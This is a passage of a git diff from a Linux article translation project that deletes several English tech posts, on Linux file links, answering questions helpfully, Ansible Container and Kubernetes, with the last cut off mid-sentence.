inode, number **658270**. The soft link named **link3.file.txt**points to **link2.file.txt**. Use the **cat** command to display the contents of **link3.file.txt**. The file mode information for the symlink starts with the letter "**l**" which indicates that this file is actually a symbolic link. + +The size of the symlink **link3.file.txt** is only 14 bytes in the example above. That is the size of the text **link3.file.txt -> link2.file.txt**, which is the actual content of the directory entry. The directory entry **link3.file.txt** does not point to an inode; it points to another directory entry, which makes it useful for creating links that span file system boundaries. So, let's create that link we tried before from the **/tmp** directory. + +``` +[dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt +/tmp/link3.file.txt ; ls -l /tmp/link* +lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> +/home/dboth/temp/link2.file.txt +``` + +### **Deleting links** + +There are some other things that you should consider when you need to delete links or the files to which they point. + +First, let's delete the link **main.file.txt**. Remember that every directory entry that points to an inode is simply a hard link. + +``` +[dboth@david temp]$ rm main.file.txt ; ls -li +total 8 +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link2.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +The link **main.file.txt** was the first link created when the file was created. Deleting it now still leaves the original file and its data on the hard drive along with all the remaining hard links. To delete the file and its data, you would have to delete all the remaining hard links. + +Now delete the **link2.file.txt** hard link. + +``` +[dboth@david temp]$ rm link2.file.txt ; ls -li +total 8 +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +Notice what happens to the soft link. Deleting the hard link to which the soft link points leaves a broken link. On my system, the broken link is highlighted in colors and the target hard link is flashing. If the broken link needs to be fixed, you can create another hard link in the same directory with the same name as the old one, so long as not all the hard links have been deleted. You could also recreate the link itself, with the link maintaining the same name but pointing to one of the remaining hard links. Of course, if the soft link is no longer needed, it can be deleted with the **rm** command. + +The **unlink** command can also be used to delete files and links. It is very simple and has no options, as the **rm** command does. It does, however, more accurately reflect the underlying process of deletion, in that it removes the link—the directory entry—to the file being deleted. + +### Final thoughts + +I worked with both types of links for a long time before I began to understand their capabilities and idiosyncrasies. It took writing a lab project for a Linux class I taught to fully appreciate how links work. This article is a simplification of what I taught in that class, and I hope it speeds your learning curve. + +-------------------------------------------------------------------------------- + +作者简介: + +David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. + +--------------------------------- + +via: https://opensource.com/article/17/6/linking-linux-filesystem + +作者:[David Both ][a] +译者:[runningwater](https://github.com/runningwater) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/resources/what-is-linux?src=linux_resource_menu +[2]:https://opensource.com/resources/what-are-linux-containers?src=linux_resource_menu +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=7016000000127cYAAQ +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?src=linux_resource_menu&intcmp=7016000000127cYAAQ +[5]:https://opensource.com/tags/linux?src=linux_resource_menu +[6]:https://opensource.com/article/17/6/linking-linux-filesystem?rate=YebHxA-zgNopDQKKOyX3_r25hGvnZms_33sYBUq-SMM +[7]:https://opensource.com/user/14106/feed +[8]:https://www.flickr.com/photos/digypho/7905320090 +[9]:https://creativecommons.org/licenses/by/2.0/ +[10]:https://opensource.com/article/17/5/introduction-ext4-filesystem +[11]:https://opensource.com/article/16/11/managing-devices-linux +[12]:https://opensource.com/life/16/10/introduction-linux-filesystems +[13]:https://opensource.com/business/16/9/linux-users-guide-lvm +[14]:https://opensource.com/life/15/9/everything-is-a-file +[15]:https://opensource.com/article/17/5/introduction-ext4-filesystem +[16]:https://opensource.com/article/17/5/introduction-ext4-filesystem#fig2 +[17]:https://opensource.com/users/dboth +[18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md deleted file mode 100644 index 8a3601ed06..0000000000 --- a/sources/tech/20170921 How to answer questions in a helpful way.md +++ /dev/null @@ -1,172 +0,0 @@ -How to answer questions in a helpful way -============================================================ - -Your coworker asks you a slightly unclear question. How do you answer? I think asking questions is a skill (see [How to ask good questions][1]) and that answering questions in a helpful way is also a skill! Both of them are super useful. - -To start out with – sometimes the people asking you questions don’t respect your time, and that sucks. I’m assuming here throughout that that’s not what happening – we’re going to assume that the person asking you questions is a reasonable person who is trying their best to figure something out and that you want to help them out. Everyone I work with is like that and so that’s the world I live in :) - -Here are a few strategies for answering questions in a helpful way! - -### If they’re not asking clearly, help them clarify - -Often beginners don’t ask clear questions, or ask questions that don’t have the necessary information to answer the questions. Here are some strategies you can use to help them clarify. - -* **Rephrase a more specific question** back at them (“Are you asking X?”) - -* **Ask them for more specific information** they didn’t provide (“are you using IPv6?”) - -* **Ask what prompted their question**. For example, sometimes people come into my team’s channel with questions about how our service discovery works. Usually this is because they’re trying to set up/reconfigure a service. In that case it’s helpful to ask “which service are you working with? Can I see the pull request you’re working on?” - -A lot of these strategies come from the [how to ask good questions][2] post. (though I would never say to someone “oh you need to read this Document On How To Ask Good Questions before asking me a question”) - -### Figure out what they know already - -Before answering a question, it’s very useful to know what the person knows already! - -Harold Treen gave me a great example of this: - -> Someone asked me the other day to explain “Redux Sagas”. Rather than dive in and say “They are like worker threads that listen for actions and let you update the store!”  -> I started figuring out how much they knew about Redux, actions, the store and all these other fundamental concepts. From there it was easier to explain the concept that ties those other concepts together. - -Figuring out what your question-asker knows already is important because they may be confused about fundamental concepts (“What’s Redux?”), or they may be an expert who’s getting at a subtle corner case. An answer building on concepts they don’t know is confusing, and an answer that recaps things they know is tedious. - -One useful trick for asking what people know – instead of “Do you know X?”, maybe try “How familiar are you with X?”. - -### Point them to the documentation - -“RTFM” is the classic unhelpful answer to a question, but pointing someone to a specific piece of documentation can actually be really helpful! When I’m asking a question, I’d honestly rather be pointed to documentation that actually answers my question, because it’s likely to answer other questions I have too. - -I think it’s important here to make sure you’re linking to documentation that actually answers the question, or at least check in afterwards to make sure it helped. Otherwise you can end up with this (pretty common) situation: - -* Ali: How do I do X? - -* Jada: - -* Ali: That doesn’t actually explain how to X, it only explains Y! - -If the documentation I’m linking to is very long, I like to point out the specific part of the documentation I’m talking about. The [bash man page][3] is 44,000 words (really!), so just saying “it’s in the bash man page” is not that helpful :) - -### Point them to a useful search - -Often I find things at work by searching for some Specific Keyword that I know will find me the answer. That keyword might not be obvious to a beginner! So saying “this is the search I’d use to find the answer to that question” can be useful. Again, check in afterwards to make sure the search actually gets them the answer they need :) - -### Write new documentation - -People often come and ask my team the same questions over and over again. This is obviously not the fault of the people (how should  _they_  know that 10 people have asked this already, or what the answer is?). So we’re trying to, instead of answering the questions directly, - -1. Immediately write documentation - -2. Point the person to the new documentation we just wrote - -3. Celebrate! - -Writing documentation sometimes takes more time than just answering the question, but it’s often worth it! Writing documentation is especially worth it if: - -a. It’s a question which is being asked again and again b. The answer doesn’t change too much over time (if the answer changes every week or month, the documentation will just get out of date and be frustrating) - -### Explain what you did - -As a beginner to a subject, it’s really frustrating to have an exchange like this: - -* New person: “hey how do you do X?” - -* More Experienced Person: “I did it, it is done.” - -* New person: ….. but what did you DO?! - -If the person asking you is trying to learn how things work, it’s helpful to: - -* Walk them through how to accomplish a task instead of doing it yourself - -* Tell them the steps for how you got the answer you gave them! - -This might take longer than doing it yourself, but it’s a learning opportunity for the person who asked, so that they’ll be better equipped to solve such problems in the future. - -Then you can have WAY better exchanges, like this: - -* New person: “I’m seeing errors on the site, what’s happening?” - -* More Experienced Person: (2 minutes later) “oh that’s because there’s a database failover happening” - -* New person: how did you know that??!?!? - -* More Experienced Person: “Here’s what I did!”: - 1. Often these errors are due to Service Y being down. I looked at $PLACE and it said Service Y was up. So that wasn’t it. - - 2. Then I looked at dashboard X, and this part of that dashboard showed there was a database failover happening. - - 3. Then I looked in the logs for the service and it showed errors connecting to the database, here’s what those errors look like. - -If you’re explaining how you debugged a problem, it’s useful both to explain how you found out what the problem was, and how you found out what the problem wasn’t. While it might feel good to look like you knew the answer right off the top of your head, it feels even better to help someone improve at learning and diagnosis, and understand the resources available. - -### Solve the underlying problem - -This one is a bit tricky. Sometimes people think they’ve got the right path to a solution, and they just need one more piece of information to implement that solution. But they might not be quite on the right path! For example: - -* George: I’m doing X, and I got this error, how do I fix it - -* Jasminda: Are you actually trying to do Y? If so, you shouldn’t do X, you should do Z instead - -* George: Oh, you’re right!!! Thank you! I will do Z instead. - -Jasminda didn’t answer George’s question at all! Instead she guessed that George didn’t actually want to be doing X, and she was right. That is helpful! - -It’s possible to come off as condescending here though, like - -* George: I’m doing X, and I got this error, how do I fix it? - -* Jasminda: Don’t do that, you’re trying to do Y and you should do Z to accomplish that instead. - -* George: Well, I am not trying to do Y, I actually want to do X because REASONS. How do I do X? - -So don’t be condescending, and keep in mind that some questioners might be attached to the steps they’ve taken so far! It might be appropriate to answer both the question they asked and the one they should have asked: “Well, if you want to do X then you might try this, but if you’re trying to solve problem Y with that, you might have better luck doing this other thing, and here’s why that’ll work better”. - -### Ask “Did that answer your question?” - -I always like to check in after I  _think_  I’ve answered the question and ask “did that answer your question? Do you have more questions?”. - -It’s good to pause and wait after asking this because often people need a minute or two to know whether or not they’ve figured out the answer. I especially find this extra “did this answer your questions?” step helpful after writing documentation! Often when writing documentation about something I know well I’ll leave out something very important without realizing it. - -### Offer to pair program/chat in real life - -I work remote, so many of my conversations at work are text-based. I think of that as the default mode of communication. - -Today, we live in a world of easy video conferencing & screensharing! At work I can at any time click a button and immediately be in a video call/screensharing session with someone. Some problems are easier to talk about using your voices! - -For example, recently someone was asking about capacity planning/autoscaling for their service. I could tell there were a few things we needed to clear up but I wasn’t exactly sure what they were yet. We got on a quick video call and 5 minutes later we’d answered all their questions. - -I think especially if someone is really stuck on how to get started on a task, pair programming for a few minutes can really help, and it can be a lot more efficient than email/instant messaging. - -### Don’t act surprised - -This one’s a rule from the Recurse Center: [no feigning surprise][4]. Here’s a relatively common scenario - -* Human 1: “what’s the Linux kernel?” - -* Human 2: “you don’t know what the LINUX KERNEL is?!!!!?!!!???” - -Human 2’s reaction (regardless of whether they’re  _actually_  surprised or not) is not very helpful. It mostly just serves to make Human 1 feel bad that they don’t know what the Linux kernel is. - -I’ve worked on actually pretending not to be surprised even when I actually am a bit surprised the person doesn’t know the thing and it’s awesome. - -### Answering questions well is awesome - -Obviously not all these strategies are appropriate all the time, but hopefully you will find some of them helpful! I find taking the time to answer questions and teach people can be really rewarding. - -Special thanks to Josh Triplett for suggesting this post and making many helpful additions, and to Harold Treen, Vaibhav Sagar, Peter Bhat Harkins, Wesley Aptekar-Cassels, and Paul Gowder for reading/commenting. - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/answer-questions-well/ - -作者:[ Julia Evans][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:https://jvns.ca/blog/good-questions/ -[2]:https://jvns.ca/blog/good-questions/ -[3]:https://linux.die.net/man/1/bash -[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md deleted file mode 100644 index 897b793a86..0000000000 --- a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md +++ /dev/null @@ -1,114 +0,0 @@ -How to manage Linux containers with Ansible Container -============================================================ - -### Ansible Container addresses Dockerfile shortcomings and offers complete management for containerized projects. - -![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") -Image by : opensource.com - -I love containers and use the technology every day. Even so, containers aren't perfect. Over the past couple of months, however, a set of projects has emerged that addresses some of the problems I've experienced. - -I started using containers with [Docker][11], since this project made the technology so popular. Aside from using the container engine, I learned how to use **[docker-compose][6]** and started managing my projects with it. My productivity skyrocketed! One command to run my project, no matter how complex it was. I was so happy. - -After some time, I started noticing issues. The most apparent were related to the process of creating container images. The Docker tool uses a custom file format as a recipe to produce container images—Dockerfiles. This format is easy to learn, and after a short time you are ready to produce container images on your own. The problems arise once you want to master best practices or have complex scenarios in mind. - -More on Ansible - -* [How Ansible works][1] - -* [Free Ansible eBooks][2] - -* [Ansible quick start video][3] - -* [Download and install Ansible][4] - -Let's take a break and travel to a different land: the world of [Ansible][22]. You know it? It's awesome, right? You don't? Well, it's time to learn something new. Ansible is a project that allows you to manage your infrastructure by writing tasks and executing them inside environments of your choice. No need to install and set up any services; everything can easily run from your laptop. Many people already embrace Ansible. - -Imagine this scenario: You invested in Ansible, you wrote plenty of Ansible roles and playbooks that you use to manage your infrastructure, and you are thinking about investing in containers. What should you do? Start writing container image definitions via shell scripts and Dockerfiles? That doesn't sound right. - -Some people from the Ansible development team asked this question and realized that those same Ansible roles and playbooks that people wrote and use daily can also be used to produce container images. But not just that—they can be used to manage the complete lifecycle of containerized projects. From these ideas, the [Ansible Container][12] project was born. It utilizes existing Ansible roles that can be turned into container images and can even be used for the complete application lifecycle, from build to deploy in production. - -Let's talk about the problems I mentioned regarding best practices in context of Dockerfiles. A word of warning: This is going to be very specific and technical. Here are the top three issues I have: - -### 1\. Shell scripts embedded in Dockerfiles. - -When writing Dockerfiles, you can specify a script that will be interpreted via **/bin/sh -c**. It can be something like: - -``` -RUN dnf install -y nginx -``` - -where RUN is a Dockerfile instruction and the rest are its arguments (which are passed to shell). But imagine a more complex scenario: - -``` -RUN set -eux; \ -    \ -# this "case" statement is generated via "update.sh" -    %%ARCH-CASE%%; \ -    \ -    url="https://golang.org/dl/go${GOLANG_VERSION}.${goRelArch}.tar.gz"; \ -    wget -O go.tgz "$url"; \ -    echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ -``` - -This one is taken from [the official golang image][13]. It doesn't look pretty, right? - -### 2\. You can't parse Dockerfiles easily. - -Dockerfiles are a new format without a formal specification. This is tricky if you need to process Dockerfiles in your infrastructure (e.g., automate the build process a bit). The only specification is [the code][14] that is part of **dockerd**. The problem is that you can't use it as a library. The easiest solution is to write a parser on your own and hope for the best. Wouldn't it be better to use some well-known markup language, such as YAML or JSON? - -### 3\. It's hard to control. - -If you are familiar with the internals of container images, you may know that every image is composed of layers. Once the container is created, the layers are stacked onto each other (like pancakes) using union filesystem technology. The problem is, that you cannot explicitly control this layering—you can't say, "here starts a new layer." You are forced to change your Dockerfile in a way that may hurt readability. The bigger problem is that a set of best practices has to be followed to achieve optimal results—newcomers have a really hard time here. - -### Comparing Ansible language and Dockerfiles - -The biggest shortcoming of Dockerfiles in comparison to Ansible is that Ansible, as a language, is much more powerful. For example, Dockerfiles have no direct concept of variables, whereas Ansible has a complete templating system (variables are just one of its features). Ansible contains a large number of modules that can be easily utilized, such as [**wait_for**][15], which can be used for service readiness checks—e.g., wait until a service is ready before proceeding. With Dockerfiles, everything is a shell script. So if you need to figure out service readiness, it has to be done with shell (or installed separately). The other problem with shell scripts is that, with growing complexity, maintenance becomes a burden. Plenty of people have already figured this out and turned those shell scripts into Ansible. - -If you are interested in this topic and would like to know more, please come to [Open Source Summit][16] in Prague to see [my presentation][17] on Monday, Oct. 23, at 4:20 p.m. in Palmovka room. - - _Learn more in Tomas Tomecek's talk, [From Dockerfiles to Ansible Container][7], at [Open Source Summit EU][8], which will be held October 23-26 in Prague._ - - - -### About the author - - [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - Engineer. Hacker. Speaker. Tinker. Red Hatter. Likes containers, linux, open source, python 3, rust, zsh, tmux.[More about me][9] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/10/dockerfiles-ansible-container - -作者:[Tomas Tomecek ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/tomastomecek -[1]:https://www.ansible.com/how-ansible-works?intcmp=701f2000000h4RcAAI -[2]:https://www.ansible.com/ebooks?intcmp=701f2000000h4RcAAI -[3]:https://www.ansible.com/quick-start-video?intcmp=701f2000000h4RcAAI -[4]:https://docs.ansible.com/ansible/latest/intro_installation.html?intcmp=701f2000000h4RcAAI -[5]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201&rate=Wiw_0D6PK_CAjqatYu_YQH0t1sNHEF6q09_9u3sYkCY -[6]:https://github.com/docker/compose -[7]:http://sched.co/BxIW -[8]:http://events.linuxfoundation.org/events/open-source-summit-europe -[9]:https://opensource.com/users/tomastomecek -[10]:https://opensource.com/user/175651/feed -[11]:https://opensource.com/tags/docker -[12]:https://www.ansible.com/ansible-container -[13]:https://github.com/docker-library/golang/blob/master/Dockerfile-debian.template#L14 -[14]:https://github.com/moby/moby/tree/master/builder/dockerfile -[15]:http://docs.ansible.com/wait_for_module.html -[16]:http://events.linuxfoundation.org/events/open-source-summit-europe -[17]:http://events.linuxfoundation.org/events/open-source-summit-europe/program/schedule -[18]:https://opensource.com/users/tomastomecek -[19]:https://opensource.com/users/tomastomecek -[20]:https://opensource.com/users/tomastomecek -[21]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201#comments -[22]:https://opensource.com/tags/ansible -[23]:https://opensource.com/tags/containers -[24]:https://opensource.com/tags/ansible -[25]:https://opensource.com/tags/docker -[26]:https://opensource.com/tags/open-source-summit diff --git a/sources/tech/20171005 Reasons Kubernetes is cool.md b/sources/tech/20171005 Reasons Kubernetes is cool.md deleted file mode 100644 index a9d10b9cdb..0000000000 --- a/sources/tech/20171005 Reasons Kubernetes is cool.md +++ /dev/null @@ -1,148 +0,0 @@ -Reasons Kubernetes is cool -============================================================ - -When I first learned about Kubernetes (a year and a half ago?) I really didn’t understand why I should care about it. - -I’ve been working full time with Kubernetes for 3 months or so and now have some thoughts about why I think it’s useful. (I’m still very far from being a Kubernetes expert!) Hopefully this will help a little in your journey to understand what even is going on with Kubernetes! - -I will try to explain some reason I think Kubenetes is interesting without using the words “cloud native”, “orchestration”, “container”, or any Kubernetes-specific terminology :). I’m going to explain this mostly from the perspective of a kubernetes operator / infrastructure engineer, since my job right now is to set up Kubernetes and make it work well. - -I’m not going to try to address the question of “should you use kubernetes for your production systems?” at all, that is a very complicated question. (not least because “in production” has totally different requirements depending on what you’re doing) - -### Kubernetes lets you run code in production without setting up new servers - -The first pitch I got for Kubernetes was the following conversation with my partner Kamal: - -Here’s an approximate transcript: - -* Kamal: With Kubernetes you can set up a new service with a single command - -* Julia: I don’t understand how that’s possible. - -* Kamal: Like, you just write 1 configuration file, apply it, and then you have a HTTP service running in production - -* Julia: But today I need to create new AWS instances, write a puppet manifest, set up service discovery, configure my load balancers, configure our deployment software, and make sure DNS is working, it takes at least 4 hours if nothing goes wrong. - -* Kamal: Yeah. With Kubernetes you don’t have to do any of that, you can set up a new HTTP service in 5 minutes and it’ll just automatically run. As long as you have spare capacity in your cluster it just works! - -* Julia: There must be a trap - -There kind of is a trap, setting up a production Kubernetes cluster is (in my experience) is definitely not easy. (see [Kubernetes The Hard Way][3] for what’s involved to get started). But we’re not going to go into that right now! - -So the first cool thing about Kubernetes is that it has the potential to make life way easier for developers who want to deploy new software into production. That’s cool, and it’s actually true, once you have a working Kubernetes cluster you really can set up a production HTTP service (“run 5 of this application, set up a load balancer, give it this DNS name, done”) with just one configuration file. It’s really fun to see. - -### Kubernetes gives you easy visibility & control of what code you have running in production - -IMO you can’t understand Kubernetes without understanding etcd. So let’s talk about etcd! - -Imagine that I asked you today “hey, tell me every application you have running in production, what host it’s running on, whether it’s healthy or not, and whether or not it has a DNS name attached to it”. I don’t know about you but I would need to go look in a bunch of different places to answer this question and it would take me quite a while to figure out. I definitely can’t query just one API. - -In Kubernetes, all the state in your cluster – applications running (“pods”), nodes, DNS names, cron jobs, and more – is stored in a single database (etcd). Every Kubernetes component is stateless, and basically works by - -* Reading state from etcd (eg “the list of pods assigned to node 1”) - -* Making changes (eg “actually start running pod A on node 1”) - -* Updating the state in etcd (eg “set the state of pod A to ‘running’”) - -This means that if you want to answer a question like “hey, how many nginx pods do I have running right now in that availabliity zone?” you can answer it by querying a single unified API (the Kubernetes API!). And you have exactly the same access to that API that every other Kubernetes component does. - -This also means that you have easy control of everything running in Kubernetes. If you want to, say, - -* Implement a complicated custom rollout strategy for deployments (deploy 1 thing, wait 2 minutes, deploy 5 more, wait 3.7 minutes, etc) - -* Automatically [start a new webserver][1] every time a branch is pushed to github - -* Monitor all your running applications to make sure all of them have a reasonable cgroups memory limit - -all you need to do is to write a program that talks to the Kubernetes API. (a “controller”) - -Another very exciting thing about the Kubernetes API is that you’re not limited to just functionality that Kubernetes provides! If you decide that you have your own opinions about how your software should be deployed / created / monitored, then you can write code that uses the Kubernetes API to do it! It lets you do everything you need. - -### If every Kubernetes component dies, your code will still keep running - -One thing I was originally promised (by various blog posts :)) about Kubernetes was “hey, if the Kubernetes apiserver and everything else dies, it’s ok, your code will just keep running”. I thought this sounded cool in theory but I wasn’t sure if it was actually true. - -So far it seems to be actually true! - -I’ve been through some etcd outages now, and what happens is - -1. All the code that was running keeps running - -2. Nothing  _new_  happens (you can’t deploy new code or make changes, cron jobs will stop working) - -3. When everything comes back, the cluster will catch up on whatever it missed - -This does mean that if etcd goes down and one of your applications crashes or something, it can’t come back up until etcd returns. - -### Kubernetes’ design is pretty resilient to bugs - -Like any piece of software, Kubernetes has bugs. For example right now in our cluster the controller manager has a memory leak, and the scheduler crashes pretty regularly. Bugs obviously aren’t good but so far I’ve found that Kubernetes’ design helps mitigate a lot of the bugs in its core components really well. - -If you restart any component, what happens is: - -* It reads all its relevant state from etcd - -* It starts doing the necessary things it’s supposed to be doing based on that state (scheduling pods, garbage collecting completed pods, scheduling cronjobs, deploying daemonsets, whatever) - -Because all the components don’t keep any state in memory, you can just restart them at any time and that can help mitigate a variety of bugs. - -For example! Let’s say you have a memory leak in your controller manager. Because the controller manager is stateless, you can just periodically restart it every hour or something and feel confident that you won’t cause any consistency issues. Or we ran into a bug in the scheduler where it would sometimes just forget about pods and never schedule them. You can sort of mitigate this just by restarting the scheduler every 10 minutes. (we didn’t do that, we fixed the bug instead, but you  _could_  :) ) - -So I feel like I can trust Kubernetes’ design to help make sure the state in the cluster is consistent even when there are bugs in its core components. And in general I think the software is generally improving over time. The only stateful thing you have to operate is etcd - -Not to harp on this “state” thing too much but – I think it’s cool that in Kubernetes the only thing you have to come up with backup/restore plans for is etcd (unless you use persistent volumes for your pods). I think it makes kubernetes operations a lot easier to think about. - -### Implementing new distributed systems on top of Kubernetes is relatively easy - -Suppose you want to implement a distributed cron job scheduling system! Doing that from scratch is a ton of work. But implementing a distributed cron job scheduling system inside Kubernetes is much easier! (still not trivial, it’s still a distributed system) - -The first time I read the code for the Kubernetes cronjob controller I was really delighted by how simple it was. Here, go read it! The main logic is like 400 lines of Go. Go ahead, read it! => [cronjob_controller.go][4] <= - -Basically what the cronjob controller does is: - -* Every 10 seconds: - * Lists all the cronjobs that exist - - * Checks if any of them need to run right now - - * If so, creates a new Job object to be scheduled & actually run by other Kubernetes controllers - - * Clean up finished jobs - - * Repeat - -The Kubernetes model is pretty constrained (it has this pattern of resources are defined in etcd, controllers read those resources and update etcd), and I think having this relatively opinionated/constrained model makes it easier to develop your own distributed systems inside the Kubernetes framework. - -Kamal introduced me to this idea of “Kubernetes is a good platform for writing your own distributed systems” instead of just “Kubernetes is a distributed system you can use” and I think it’s really interesting. He has a prototype of a [system to run an HTTP service for every branch you push to github][5]. It took him a weekend and is like 800 lines of Go, which I thought was impressive! - -### Kubernetes lets you do some amazing things (but isn’t easy) - -I started out by saying “kubernetes lets you do these magical things, you can just spin up so much infrastructure with a single configuration file, it’s amazing”. And that’s true! - -What I mean by “Kubernetes isn’t easy” is that Kubernetes has a lot of moving parts learning how to successfully operate a highly available Kubernetes cluster is a lot of work. Like I find that with a lot of the abstractions it gives me, I need to understand what is underneath those abstractions in order to debug issues and configure things properly. I love learning new things so this doesn’t make me angry or anything, I just think it’s important to know :) - -One specific example of “I can’t just rely on the abstractions” that I’ve struggled with is that I needed to learn a LOT [about how networking works on Linux][6] to feel confident with setting up Kubernetes networking, way more than I’d ever had to learn about networking before. This was very fun but pretty time consuming. I might write more about what is hard/interesting about setting up Kubernetes networking at some point. - -Or I wrote a [2000 word blog post][7] about everything I had to learn about Kubernetes’ different options for certificate authorities to be able to set up my Kubernetes CAs successfully. - -I think some of these managed Kubernetes systems like GKE (google’s kubernetes product) may be simpler since they make a lot of decisions for you but I haven’t tried any of them. - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/10/05/reasons-kubernetes-is-cool/ - -作者:[ Julia Evans][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:https://github.com/kamalmarhubi/kubereview -[2]:https://jvns.ca/categories/kubernetes -[3]:https://github.com/kelseyhightower/kubernetes-the-hard-way -[4]:https://github.com/kubernetes/kubernetes/blob/e4551d50e57c089aab6f67333412d3ca64bc09ae/pkg/controller/cronjob/cronjob_controller.go -[5]:https://github.com/kamalmarhubi/kubereview -[6]:https://jvns.ca/blog/2016/12/22/container-networking/ -[7]:https://jvns.ca/blog/2017/08/05/how-kubernetes-certificates-work/ diff --git a/sources/tech/20171010 Operating a Kubernetes network.md b/sources/tech/20171010 Operating a Kubernetes network.md deleted file mode 100644 index 9c85e9aa70..0000000000 --- a/sources/tech/20171010 Operating a Kubernetes network.md +++ /dev/null @@ -1,216 +0,0 @@ -Operating a Kubernetes network -============================================================ - -I’ve been working on Kubernetes networking a lot recently. One thing I’ve noticed is, while there’s a reasonable amount written about how to **set up** your Kubernetes network, I haven’t seen much about how to **operate** your network and be confident that it won’t create a lot of production incidents for you down the line. - -In this post I’m going to try to convince you of three things: (all I think pretty reasonable :)) - -* Avoiding networking outages in production is important - -* Operating networking software is hard - -* It’s worth thinking critically about major changes to your networking infrastructure and the impact that will have on your reliability, even if very fancy Googlers say “this is what we do at Google”. (google engineers are doing great work on Kubernetes!! But I think it’s important to still look at the architecture and make sure it makes sense for your organization.) - -I’m definitely not a Kubernetes networking expert by any means, but I have run into a few issues while setting things up and definitely know a LOT more about Kubernetes networking than I used to. - -### Operating networking software is hard - -Here I’m not talking about operating physical networks (I don’t know anything about that), but instead about keeping software like DNS servers & load balancers & proxies working correctly. - -I have been working on a team that’s responsible for a lot of networking infrastructure for a year, and I have learned a few things about operating networking infrastructure! (though I still have a lot to learn obviously). 3 overall thoughts before we start: - -* Networking software often relies very heavily on the Linux kernel. So in addition to configuring the software correctly you also need to make sure that a bunch of different sysctls are set correctly, and a misconfigured sysctl can easily be the difference between “everything is 100% fine” and “everything is on fire”. - -* Networking requirements change over time (for example maybe you’re doing 5x more DNS lookups than you were last year! Maybe your DNS server suddenly started returning TCP DNS responses instead of UDP which is a totally different kernel workload!). This means software that was working fine before can suddenly start having issues. - -* To fix a production networking issues you often need a lot of expertise. (for example see this [great post by Sophie Haskins on debugging a kube-dns issue][1]) I’m a lot better at debugging networking issues than I was, but that’s only after spending a huge amount of time investing in my knowledge of Linux networking. - -I am still far from an expert at networking operations but I think it seems important to: - -1. Very rarely make major changes to the production networking infrastructure (because it’s super disruptive) - -2. When you  _are_  making major changes, think really carefully about what the failure modes are for the new network architecture are - -3. Have multiple people who are able to understand your networking setup - -Switching to Kubernetes is obviously a pretty major networking change! So let’s talk about what some of the things that can go wrong are! - -### Kubernetes networking components - -The Kubernetes networking components we’re going to talk about in this post are: - -* Your overlay network backend (like flannel/calico/weave net/romana) - -* `kube-dns` - -* `kube-proxy` - -* Ingress controllers / load balancers - -* The `kubelet` - -If you’re going to set up HTTP services you probably need all of these. I’m not using most of these components yet but I’m trying to understand them, so that’s what this post is about. - -### The simplest way: Use host networking for all your containers - -Let’s start with the simplest possible thing you can do. This won’t let you run HTTP services in Kubernetes. I think it’s pretty safe because there are less moving parts. - -If you use host networking for all your containers I think all you need to do is: - -1. Configure the kubelet to configure DNS correctly inside your containers - -2. That’s it - -If you use host networking for literally every pod you don’t need kube-dns or kube-proxy. You don’t even need a working overlay network. - -In this setup your pods can connect to the outside world (the same way any process on your hosts would talk to the outside world) but the outside world can’t connect to your pods. - -This isn’t super important (I think most people want to run HTTP services inside Kubernetes and actually communicate with those services) but I do think it’s interesting to realize 